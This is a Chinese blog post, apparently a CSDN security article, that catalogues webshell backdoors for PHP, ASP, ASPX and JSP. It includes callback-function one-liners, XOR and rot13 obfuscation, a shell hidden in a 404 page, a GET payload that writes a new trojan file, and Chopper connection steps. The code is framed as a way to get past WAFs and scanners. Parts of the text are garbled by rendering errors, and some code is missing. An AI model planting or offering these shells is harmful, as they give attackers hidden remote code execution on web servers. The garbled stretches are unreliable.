webshell函数回调

目录

经典一句话

利用简单的拼接字符串

利用php回调函数等技巧绕过WAF的方法(姑且简称“回调后门”吧)

  1. 利用 array_filter+base64_decode

2.利用array_map+base64_decode

3.利用uasort+base64_decode

4.利用array_walk+preg_replace

5.利用array_walk_recursive+preg_replace

6.利用mb_ereg_replace

7.利用preg_filter

8.利用register_shutdown_function

9.利用register_tick_function

10.利用filter_var

强悍的PHP一句话后门

               利用404页面隐藏PHP小马:

      无特征隐藏PHP一句话:

      超级隐蔽的PHP后门:

      层级请求,编码运行PHP后门:

      PHP后门生成工具weevely

三个变形的一句话PHP木马

     第一个

     第二个

     第三个

最后列几个高级的PHP一句话木马后门:
经典一句话

PHP:

ASP: <%eval request(“pass”)%>

.NET: <%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>

我们写一句话最终还是要拼接成经典的一句话的,当然,实现方式不止eval,还可以是assert,而且很多时候用菜刀连接的时候使用的是assert,具体原因见 从底层分析eval和assert的区别
利用简单的拼接字符串


用法: http://www.xxx.com/1.php

菜刀连接用法: http://www.xxx.com/1.php

密码:joker

详解: assert,是php代码执行函数,与eval()有同样的功能,应为 a r r a y [ ] , P O S T [ ] 都 是 数 组 , 所 以 a r r a y [ ] = a r r a y [ ] = P O S T , 就 是 把 P O S T 数 组 的 值 赋 给 P O S T 数 组 的 值 赋 给 a r r a y 数 组 , 这 样 的 话 array[],POST[]都是数组,所以array[]=array[]=POST,就是把POST数组的值赋给POST数组的值赋给array数组,这样的话 array[],POST[]array[]=array[]=POSTPOSTPOSTarrayarray[0][‘POST’]的输出就是assert,所以组成了一句话木马

assert($_POST[‘joker’]),直接用菜刀链接即可


用法: http://www.xxx.com/2.php

菜刀连接用法: http://www.xxx.com/2.php

密码:joker

详解: g 是 个 数 组 , g [ 1 ] = ′ s ′ , c h r ( ′ 116 ′ ) = ′ t ′ , ( h t t p s : / / b l o g . c s d n . n e t / y a b i n g s h i t e c h / a r t i c l e / d e t a i l s / 19833217 A S C l l 码 对 应 表 ) , 这 样 的 g [ 1 ] = ′ s ′ , c h r ( ′ 116 ′ ) = ′ t ′ , ( h t t p s : / / b l o g . c s d n . n e t / y a b i n g s h i t e c h / a r t i c l e / d e t a i l s / 19833217 A S C l l 码 对 应 表 ) , 这 样 的 g g = a s s e r t , @ g g ( g g ( P O S T [ j o k e r ] ) 不 就 是 a s s e r t ( g是个数组,g[1]=′s′,chr(′116′)=′t′,(https://blog.csdn.net/yabingshitech/article/details/19833217ASCll码对应表),这样的g[1]=′s′,chr(′116′)=′t′,(https://blog.csdn.net/yabingshitech/article/details/19833217ASCll码对应表),这样的gg=assert,@gg(gg(_POST[joker])不就是assert( gg[1]=schr(116)=t,(https://blog.csdn.net/yabingshitech/article/details/19833217ASCll)g[1]=schr(116)=t,(https://blog.csdn.net/yabingshitech/article/details/19833217ASCll)gg=assert@gg(gg(POST[joker])assert(_POST[joker]),是我们常见的一句话木马,直接菜刀链接即可
利用php回调函数等技巧绕过WAF的方法(姑且简称“回调后门”吧)

  1. 利用 array_filter+base64_decode

用法:

http://www.xxx.com/settoken.php?e=YXNzZXJ0 (这里的“YXNzZXJ0 ”是assert用base64加密后的,因为源码用到了base64_decode)

浏览器提交POST:settoken=phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=YXNzZXJ0

密码:settoken

补充:

array_filter()回调函数,原型为:

array array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )

依次将 array 数组中的每个值传递到 callback 函数。如果 callback 函数返回 true,则 array 数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。这样就构成了assert($_POST[‘POST’])这个经典一句话
2.利用array_map+base64_decode


类似上一个array_filter,都是php回调函数的利用

用法:同上一个
3.利用uasort+base64_decode



 1, $_REQUEST['settoken'] => 2);
uksort($arr, $e);
?>

用法类似

再给出这两个函数,面向对象的方法:
// method 0
$arr = new ArrayObject(array(‘test’, $_REQUEST[‘pass’]));
$arr->uasort(‘assert’);

// method 1
$arr = new ArrayObject(array(‘test’ => 1, $_REQUEST[‘pass’] => 2));
$arr->uksort(‘assert’);

再来两个类似的回调后门:
$e = $_REQUEST[‘e’];
$arr = array(1);
$e = $_REQUEST[‘e’];

a r r = a r r a y ( arr = array( arr=array(_POST[‘pass’]);
a r r 2 = a r r a y ( 1 ) ; a r r a y u d i f f ( arr2 = array(1); array_udiff( arr2=array(1);arrayudiff(arr, $arr2, $e);

以上几个都是可以直接菜刀连接的一句话,但目标PHP版本在5.4.8及以上才可用.

php中,可以执行代码的函数:
1: 一个参数:assert
2: 两个参数:assert(php5.4.8+)
3: 三个参数:preg_replace /e模式

三个参数可以用preg_replace。所以我这里构造了一个array_walk+preg_replace的回调后门:
4.利用array_walk+preg_replace

 '|.*|e',);
array_walk($arr, $e, '');
?>

用法:

http://www.xxx.com/settoken.php?e=preg_replace

浏览器提交POST:settoken=phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=preg_replace

密码:settoken

这个后门可以在php5.3下使用.
5.利用array_walk_recursive+preg_replace

 '|.*|e',);
array_walk_recursive($arr, $e, '');
?>

用法:

http://www.xxx.com/settoken.php?e=preg_replace

浏览器提交POST:settoken=phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=preg_replace

密码:settoken

看了以上几个回调后门,发现preg_replace确实好用.但显然很多WAF和安全狗 DD盾什么的早就盯上这个函数了.其实php里不止这个函数可以执行eval的功能,还有几个类似的:
6.利用mb_ereg_replace

7.利用preg_filter

第六个 第七个的用法:

http://www.xxx.com/settoken.php?e=assert

浏览器提交POST:settoken=phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=assert

密码:settoken

推荐这个单参数后门,在各个版本都比较好驾驭. 这里给出几个好用不杀的回调后门
8.利用register_shutdown_function


这个函数的官方文档点击这里

这个是php全版本支持的,且不报不杀稳定执行.

详解:register_shutdown_function()函数是来注册一个会在PHP中止时执行的函数,

PHP中止的情况有三种:

执行完成
exit/die导致的中止
发生致命错误中止    
   ,这样的话等到php函数执行完成,就会调用我们传进去的php中止时执行的函数

构成 assert($_REQUEST[‘joker’]) ,一句话木马 ,直接用菜刀链接即可.

用法:

浏览器GET提交:http://www.xxx.com/settoken.php?e=assert&settoken=phpinfo();

即可执行phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=assert

密码:settoken
9.利用register_tick_function


详解:register_tick_function函数必须要和declare流程控制机制合并使用,那么就先了解一下declare和tick:Tick 是一个在 declare 代码段中解释器每执行 N 条低级语句就会发生的事件。N 的值是在 declare 中的 directive 部分用 ticks=N 来指定的。在每个 tick 中出现的事件是由 register_tick_function() 来指定的。也就是说当ticks=1,每执行1行代码,就需要运行一次我们传过来的assert()函数,$_REQUEST[‘joker’]是参数

这样就构成了assert($_REQUEST[‘joker’]) ,直接用菜刀链接一句话木马即可

用法:

浏览器GET提交:http://www.xxx.com/settoken.php?e=assert&settoken=phpinfo();

即可执行phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=assert

密码:settoken
10.利用filter_var

 'assert')); 
?>

filter_var函数介绍点击这里

用法:

浏览器GET提交:http://www.xxx.com/settoken.php?e=assert&settoken=phpinfo();

即可执行phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=assert

密码:settoken
强悍的PHP一句话后门

               转自

利用404页面隐藏PHP小马:

    
    
    404 Not Found
    
    

Not Found

The requested URL was not found on this server.

404页面是网站常用的文件,一般创建好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。 无特征隐藏PHP一句话:

将POST[′code′]的内容赋值给POST[′code′]的内容赋值给_SESSION[‘theCode’],然后执行$_SESSION[‘theCode’],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。

超级隐蔽的PHP后门:



仅用GET函数就构成了木马;

利用方法:

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。

 层级请求,编码运行PHP后门:

    

文件2:

     $url,
        CURLOPT_HEADER => FALSE,
        CURLOPT_RETURNTRANSFER => TRUE,
        CURLOPT_REFERER => $referer
    );
    curl_setopt_array($ch, $options);
    echo curl_exec($ch);
    ?>

 通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果,一般waf对referer这些检测要松一点,或者没有检测。用这个思路bypass waf不错。
PHP后门生成工具weevely

weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理,weevely生成的服务器端php代码是经过了base64编码的,所以可以骗过主流的杀毒软件和IDS,上传服务器端代码后通常可以通过weevely直接运行。

weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,被作为检查规则的eval,system等函数都不会直接出现在代码中,从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描,结果显示该文件无任何威胁。

以上是大概介绍下边是截图,相关使用方法亦家就不在这介绍了,简单的科普一下。

那些强悍的PHP一句话后门
三个变形的一句话PHP木马

第一个

在菜刀里写 site/1.php?2=assert 密码是1

第二个





1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。

2、$++;这行代码的意思是对变量名为""的变量进行自增操作,在PHP中未定义的变量默认值为null,nullfalse0,可以在不使用任何数字的情况下,

通过对未定义变量的自增操作来得到一个数字。

3、$__=(""^"?").(":"^"}").("%"^"").("{"^"/");

("`"^"?") 01100000^00111111=01011111 —>”_”

(":"^"}") 00111010^01111101=01000111—>”G”

("%"^"`") 00100101^01100000=01000101—>”E”

("{"^"/") 01111011^ 00101111=01010100—>”T”

得到$__=_GET

4、KaTeX parse error: Expected group after '_' at position 1: _̲__=("""{").("~"".").("/""`").("-""~").("("^"|");

("$"^"{") 00100100^01111011=01011111—>”_”

("~"^".") 01111110^00101110=01010000—>”P”

("/"^"`") 00101111^01100000=01001111—>”O”

("-"^"~") 00101101^01111110=01010011—>”S”

("("^"|") 00101000^01111100=01010100—>”T”

得到$___=_POST

5、KaTeX parse error: Expected '}', got 'EOF' at end of input: {__}[! ] ( _]( ]({KaTeX parse error: Expected group after '_' at position 1: _̲__}[_]);

得到 G E T [ 0 ] ( _GET[0]( GET[0](_POST[1]);

6、构造一句话木马,将“0”当成参数,赋值为“assert”

7、使用菜刀工具连接,地址

http://ip/b.php?0=assert 密码为1

在菜刀里写 site/2.php?_=assert&__=eval($_POST[‘pass’]) 密码是pass。如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。

第三个

($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');

str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果,让人吐血!

最后列几个高级的PHP一句话木马后门:

1、
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话
 
 
2、
$filename=$_GET['xbid'];
include ($filename);
//危险的include函数,直接编译任何文件为php格式运行
 
 
3、
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件
 
 
4、
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话
 
 
5、include ($uid);
//危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句话
 
 
6、典型一句话
程序后门代码

程序代码

//容错代码
程序代码

//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码

程序代码

程序代码

//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
程序代码
h=@eval_r($_POST1);
程序代码

//绕过 
<%Execute(request("a"))%> 
%><%execute request("a")%><%  
 
<%25Execute(request("a"))%25> 
%><%execute request("yy")%> 
<%execute request(char(97))%> 
<%eval request(char(97))%> 
":execute request("value"):a="  
 
 
在数据库里插入的一句话木马  
┼攠數畣整爠煥敵瑳∨∣┩愾  
┼癥污爠煥敵瑳∨≡┩>   密码为: a  
 
php一句话  
 
 
 
aspx一句话  
 
 
JSP一句话后门  
<%  
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());  
%> 

你可能感兴趣的:(web安全)